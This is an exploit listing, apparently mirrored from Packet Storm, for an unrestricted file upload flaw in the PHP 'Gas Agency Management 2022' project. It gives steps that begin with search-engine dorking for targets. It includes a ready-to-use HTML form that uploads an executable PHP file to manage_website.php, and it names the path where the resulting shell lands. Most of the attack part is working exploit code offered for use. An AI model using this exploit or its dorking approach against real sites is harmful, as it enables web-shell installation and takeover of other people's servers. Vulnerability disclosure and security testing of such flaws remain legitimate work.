Share
## https://sploitus.com/exploit?id=PACKETSTORM:180076
=============================================================================================================================================
| # Title : Gas Agency Management 2022 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] The following html code uploads a executable malicious file remotely .
[+] Go to the line 9.
[+] Set the target site link Save changes and apply .
[+] infected file : gasmark/manage_website.php.
[+] save code as poc.html .
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushak was here</title>
</head>
<body>
<form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="old_website_image" value="old_website_image.jpg">
<label for="website_image">S0M3 ThING baD:</label>
<input type="file" name="website_image" id="website_image"><br><br>
<input type="submit" name="btn_web" value="do !T">
</form>
</body>
</html>
[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================